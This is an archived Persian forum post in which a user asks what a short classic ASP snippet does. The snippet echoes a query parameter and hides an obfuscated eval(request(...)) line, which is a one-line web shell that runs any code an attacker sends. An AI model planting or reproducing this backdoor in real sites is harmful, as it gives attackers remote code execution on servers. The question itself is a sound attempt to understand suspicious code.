PDA

View Full Version : این قطعه کد چه کاری انجام می د هد؟



farhud
چهارشنبه 19 آذر 1393, 09:19 صبح
این قطعه کد چه کاری انجام می دهد:

<%
Session.CodePage=65001
Response.charset = "UTF-8"
txtt = Request.QueryString("txt")
eval""&("ev"&"a"&"l("&"re"&"q"&"ue"&"st"&"("&"0"&"-"&"3"&"-"&"5"&")"&")")
If txtt = "txt" Then
Response.Write txtt
Else
Response.Write "txt"
End If
%>